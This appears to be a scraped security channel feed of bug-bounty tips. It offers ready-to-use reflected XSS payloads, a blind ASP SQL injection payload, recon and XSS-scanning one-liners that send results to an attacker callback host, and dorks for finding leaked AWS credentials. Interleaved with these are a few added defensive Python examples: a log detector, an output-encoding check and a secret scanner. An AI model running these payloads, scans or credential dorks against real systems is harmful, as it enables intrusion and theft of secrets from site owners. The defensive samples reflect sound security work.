Brut Security
✅ Queries: @wtf_brut
🛃 WhatsApp: wa.link/brutsecurity
🈴 Training: brutsec.com
📨 E-mail: [email protected]
Top 3 RXSS payloads

`'";//><img/src=x onError="${x};alert(`1`);">

`'";//><Img Src=a OnError=location=src>

`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
Simple Reflected XSS
1. subfinder -d target.com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxss
For Automation Reflected XSS Scanning
#!/bin/bash

# Abort on use of an undefined variable
set -u

# Make sure every tool in the pipeline is on PATH before starting
for tool in subfinder httprobe waybackurls gf kxss; do
    command -v "$tool" >/dev/null 2>&1 || { echo "missing tool: $tool" >&2; exit 1; }
done

# Prompt user for domain input
read -r -p "Enter the domain you want to scan: " domain

# Define output file
output_file="scan_output.txt"

# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d "$domain" | httprobe -c 100 > target.txt

# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxss
echo "Scanning for XSS vulnerabilities..."
waybackurls < target.txt | gf xss | kxss >> "$output_file"

# Display output file location
echo "Scan output saved to $output_file"
🚨Toxicache🚨
👉 Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
🔗 https://lnkd.in/gdtpJGmT
Awesome Bug Bounty One-liners

A collection of awesome one-liner scripts especially for bug bounty.

Open-redirect

export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy https://127.0.0.1:8080 -sk > /dev/null

XSS

waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt

cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

📚 Repositories:
1. https://lnkd.in/dMBdxSQD

2. https://lnkd.in/ebTrAP8y

3. https://lnkd.in/dmG4G3ea

4. https://lnkd.in/dXxHMUu9
Useful XSS payloads:

"/*\"/*`/*' /*</template> </textarea></noembed></noscript></title> </style></script>--><svg onload=/*<html/*/onmouseover=alert()//>

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTIGJ5IFZpY2tpZScpPC9zY3JpcHQ+

data:text/html,<script>alert(1)</script>

<select><noembed></select><script x='a@b'a>
Cyber Security Lab Practice, RED & BLUE Team.

🌀 Attack-Defense - https://attackdefense.com
🌀 Alert to win - https://aalf.nu/alert1
🌀 Bancocn - https://bancocn.com
🌀 Buffer Overflow Labs - https://lnkd.in/eNbEWYh
🌀 CTF Komodo Security - https://ctf.komodosec.com
🌀 CryptoHack - https://cryptohack.org/
🌀 CMD Challenge - https://cmdchallenge.com
🌀 Exploitation Education - https://exploit.education
🌀 Google CTF - https://lnkd.in/e46drbz8
🌀 HackTheBox - Dr. AITH - https://www.hackthebox.com
🌀 Hackthis - https://www.hackthis.co.uk
🌀 Hacksplaining - https://lnkd.in/eAB5CSTA
🌀 Hacker101 - https://ctf.hacker101.com
🌀 Capture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
🌀 Hacking-Lab - https://hacking-lab.com/
🌀 ImmersiveLabs - https://immersivelabs.com
🌀 NewbieContest - https://lnkd.in/ewBk6fU5
🌀 OverTheWire - https://overthewire.org
🌀 Practical Pentest Labs - https://lnkd.in/esq9Yuv5
🌀 Pentestlab - https://pentesterlab.com
🌀 Penetration Testing Practice Labs - https://lnkd.in/e6wVANYd
🌀 PentestIT LAB - https://lab.pentestit.ru
🌀 PicoCTF - https://picoctf.com
🌀 PWNABLE - https://lnkd.in/eMEwBJzn
🌀 Root-Me - https://www.root-me.org
🌀 Root in Jail - https://rootinjail.com
🌀 SANS Challenger - https://lnkd.in/e5TAMawK
🌀 SmashTheStack - https://lnkd.in/eVn9rP9p
🌀 The Cryptopals Crypto Challenges - https://cryptopals.com
🌀 Try Hack Me - https://tryhackme.com
🌀 Vulnhub - https://www.vulnhub.com
🌀 Vulnmachine - https://lnkd.in/eJ2e_kD
🌀 W3Challs - https://w3challs.com
🌀 WeChall - https://www.wechall.net
🌀 Websploit - https://websploit.org/
🌀 Zenk-Security - https://lnkd.in/ewJ5rNx2
🌀 Cyberdefenders - https://lnkd.in/dVcmjEw8
🌀 LetsDefend - https://letsdefend.io/
Tricky ASP blind SQL Injection in a login page.
Payload 👇
';%20waitfor%20delay%20'0:0:6'%20--%20
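As an added example (not code from the channel post), the following Python shows the defender's side of the time-based payload above: it normalises the query-string field of constructed IIS-style log lines, flags requests that carry a T-SQL WAITFOR DELAY, and uses the recorded response time to corroborate the delay. The log layout, field order and sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in an IIS-style W3C layout (assumed field order):
# date time cs-uri-stem cs-uri-query c-ip time-taken(ms)
SAMPLE_LOG = """\
2024-05-01 10:00:01 /login.asp user=alice&pass=s3cret 198.51.100.7 48
2024-05-01 10:00:05 /login.asp user=%27%3B%20waitfor%20delay%20%270%3A0%3A6%27%20--%20&pass=x 203.0.113.9 6031
2024-05-01 10:00:09 /login.asp user=%27%3b+WAITFOR/**/DELAY+%270:0:6%27--&pass=x 203.0.113.9 6019
2024-05-01 10:00:12 /search.asp q=delay+in+shipping 198.51.100.7 52
"""

# The T-SQL delay primitive used by the payload, matched after normalisation
WAITFOR_RX = re.compile(r"waitfor\s+delay\s+'\d+:\d+:\d+'", re.IGNORECASE)


def normalise_query(raw_query: str) -> str:
    """Undo the encodings a log line hides the payload behind: percent and plus
    decoding, inline comments used in place of whitespace, and runs of blanks."""
    decoded = unquote_plus(raw_query)
    no_comments = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", no_comments)


def parse_line(line: str):
    """Split one log line into its fields; returns None for malformed lines."""
    fields = line.split(" ")
    if len(fields) != 6:
        return None
    date, time, stem, query, ip, time_taken = fields
    return {"ts": f"{date} {time}", "stem": stem, "query": query,
            "ip": ip, "time_taken_ms": int(time_taken)}


def flag_time_based_sqli(log_text: str, slow_ms: int = 5000) -> list:
    """One finding per request whose query string carries WAITFOR DELAY.
    delay_confirmed is True when the server really did take that long,
    which separates a successful injection from a blocked or harmless one."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        match = WAITFOR_RX.search(normalise_query(rec["query"]))
        if match:
            findings.append({
                "ts": rec["ts"],
                "ip": rec["ip"],
                "stem": rec["stem"],
                "pattern": match.group(0),
                "delay_confirmed": rec["time_taken_ms"] >= slow_ms,
            })
    return findings


if __name__ == "__main__":
    for finding in flag_time_based_sqli(SAMPLE_LOG):
        print(finding)
```

The normalisation step matters more than the signature: the second and third sample lines carry the same statement in different encodings and casing, and only the decoded, comment-stripped form matches once. The fix on the application side is the usual one for ASP pages of this kind, a parameterised query instead of string concatenation, so that the quote in the payload never reaches the SQL parser.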
πŸ‘9πŸ”₯8
XSS in the .css URL path

Original url: "target/lib/css/animated.min.css"

XSS Found in:
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
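The XSS posts in this feed (the RXSS payloads, the polyglot payloads, and this .css path finding) all depend on the reflected value reaching the HTML parser unencoded. The Python below is an added example, not code from the channel: it runs three of the posted payloads through a deliberately vulnerable reflection and through a context-aware encoder, then checks which rendering still lets markup through. The page template strings and the audit helper are constructed for this example.

```python
import html
from urllib.parse import unquote

# Constructed test inputs: payloads quoted in the channel posts above, used here
# only as data fed into the two renderers.
REFLECTED_INPUTS = [
    "`'\";//><img/src=x onError=\"${x};alert(`1`);\">",
    "`'\";//><Img Src=a OnError=location=src>",
    "/lib/css/animated.min'\"/><script%20>alert(document.domain)<%2fscript>.css",
]

# Assumed page template: the reflected value lands in an HTML text node
TEMPLATE_PREFIX = "<p>No results for: "
TEMPLATE_SUFFIX = "</p>"


def reflect_unsafe(user_input: str) -> str:
    """The vulnerable pattern: the raw parameter is pasted into the HTML body."""
    return TEMPLATE_PREFIX + user_input + TEMPLATE_SUFFIX


def reflect_safe(user_input: str) -> str:
    """Hardened form for an HTML text context: percent-decode exactly once
    (so an encoded '<' cannot survive a later decode) and then entity-encode
    <, >, &, double and single quotes."""
    decoded = unquote(user_input)
    return TEMPLATE_PREFIX + html.escape(decoded, quote=True) + TEMPLATE_SUFFIX


def reflected_part_breaks_out(rendered: str) -> bool:
    """True if the reflected segment still carries a character that can close
    the text node or an attribute, i.e. the browser may parse it as markup."""
    body = rendered[len(TEMPLATE_PREFIX):len(rendered) - len(TEMPLATE_SUFFIX)]
    return any(c in body for c in '<>"\'')


def audit() -> dict:
    """How many of the sample payloads break out under each renderer."""
    return {
        "unsafe_breakouts": sum(reflected_part_breaks_out(reflect_unsafe(p))
                                for p in REFLECTED_INPUTS),
        "safe_breakouts": sum(reflected_part_breaks_out(reflect_safe(p))
                              for p in REFLECTED_INPUTS),
    }


if __name__ == "__main__":
    for payload in REFLECTED_INPUTS:
        print(reflect_safe(payload))
    print(audit())
```

Two caveats a practitioner would add. html.escape is the right encoder only for HTML text and quoted-attribute contexts; a value reflected inside a JavaScript string (the context the `${x};alert(`1`)` payload is built for) or inside a URL needs JavaScript-string or URL encoding instead, and the decode-then-encode order must be kept or a double-encoded payload gets through. For the .css path finding the better fix is not to echo the requested path into an error page at all.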
Recon like a Boss.pdf
1.3 MB
Advanced XSS.pdf
370.6 KB
πŸ‘3πŸ”₯2
AWS OSINT by Dorking

=Shodan Dorks
html:"AWS_ACCESS_KEY_ID"
html:"AWS_SECRET_ACCESS_KEY"
html:"AWS_SESSION_TOKEN"
title:"AWS S3 Explorer"
html:"AWS Elastic Beanstalk overview"
html:"OpenSearch Dashboards"
"X-Amz-Server-Side-Encryption"
title:"EC2 Instance Information"
http.title:"Amazon Cognito Developer Authentication Sample"
"Server: EC2ws"
title:"AWS X-Ray Sample Application"
html:"Amazon EC2 Status"
html:"AWS EC2 Auto Scaling Lab"
html:"istBucketResult"

=Search Engine Dorks
site:.s3.amazonaws.com "Company"
site:https://s3.amazonaws.com intitle:index.of.bucket ""
site:s3.amazonaws.com "index of /" s3
site:amazonaws.com filetype:xls password
inurl:gitlab "AWS_SECRET_KEY"
inurl:pastebin "AWS_ACCESS_KEY"
inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"

=Github Dorks
Key:amazon_secret_access_key
amazonaws
aws_access
aws_access_key_id
aws_bucket aws_key
aws_secret
aws_secret_key
aws_token
bucket_password
bucketeer_aws_access_key_id
bucketeer_aws_secret_access_key
cache_s3_secret_key
cloud_watch_aws_access_key
filename:credentials
aws_access_key_id
filename:s3cfg
lottie_s3_api_key
lottie_s3_secret_key
rds.amazonaws.com password
s3_access_key
s3_access_key_id
s3_key s3_key_app_logs
s3_key_assets
s3_secret_key
sandbox_aws_access_key_id
sandbox_aws_secret_access_key
secret_key
eureka.aws
secretkey
filename:.bash_profile
aws
filename:.s3cfg
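The GitHub dorks above find what they find because people commit these file names and variable names. The Python below is an added example, not code from the channel: it is the check a team runs on its own repositories before a dork finds the same thing, flagging the sensitive file names from the list and matching AWS access key IDs and 40-character secrets assigned to the variable names the dorks search for. The sample files embed the example key pair AWS publishes in its own documentation; the pattern set, the redaction helper and the pre-commit gate are assumptions for this example.

```python
import re

# File names the GitHub dorks above search for; a commit touching one deserves review
SENSITIVE_FILENAMES = {".s3cfg", "credentials", ".bash_profile"}

PATTERNS = {
    # AWS access key IDs: AKIA (long-lived) or ASIA (temporary) plus 16 upper-case alphanumerics
    "aws_access_key_id": re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])"),
    # A 40-character secret assigned to one of the variable names in the dork list
    "aws_secret_access_key": re.compile(
        r"(?i)(?:aws_secret_access_key|aws_secret_key|aws_secret|s3_secret_key|secret_key)"
        r"\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"
    ),
}


def redact(value: str) -> str:
    """Keep only the first and last four characters so a report never re-leaks the secret."""
    return value[:4] + "*" * (len(value) - 8) + value[-4:]


def scan_text(path: str, text: str) -> list:
    """Return one finding per sensitive file name or credential-looking value in text."""
    findings = []
    basename = path.rsplit("/", 1)[-1]
    if basename in SENSITIVE_FILENAMES:
        findings.append({"file": path, "line": 0, "kind": "sensitive_filename", "match": basename})
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                value = m.group(1) if m.groups() else m.group(0)
                findings.append({"file": path, "line": lineno, "kind": kind, "match": redact(value)})
    return findings


def precommit_ok(files: dict) -> bool:
    """Pre-commit gate: True only if no staged file (path -> contents) produced a finding."""
    return not any(scan_text(path, text) for path, text in files.items())


# Constructed sample files. The key pair is the example pair from AWS's own
# documentation, so embedding it here exposes nothing.
SAMPLE_S3CFG = """[default]
access_key = AKIAIOSFODNN7EXAMPLE
secret_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
bucket_location = us-east-1
"""

SAMPLE_README = """# deploy
Set AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY in the environment; never commit them.
"""

if __name__ == "__main__":
    for finding in scan_text("deploy/.s3cfg", SAMPLE_S3CFG):
        print(finding)
    print("clean:", precommit_ok({"README.md": SAMPLE_README}))
```

The README sample shows why the variable-name patterns require an assignment: mentioning AWS_SECRET_ACCESS_KEY in prose is not a leak, a value next to it is. Findings are redacted before they are printed so the scanner's own output, which often ends up in CI logs, does not become the next dork hit.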
Web LLM Attacks.pdf
3.3 MB
🖥 100 Web Vulnerabilities, categorized into various types: 😀

⚡ Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)

⚡ Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse

⚡ Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling

⚡ Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration

⚡ XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb

⚡ Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control

⚡ Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection

⚡ API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation

⚡ Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols

⚡ Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues

⚡ Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service

⚡ Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse

⚡ Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering

⚡ IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities

⚡ Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues

⚡ Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass

⚡ Server-Side Request Forgery (SSRF):
87. Blind SSRF
88. Time-Based Blind SSRF

⚡ Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass

⚡ Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws

⚡ Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits
πŸ‘19❀‍πŸ”₯4❀2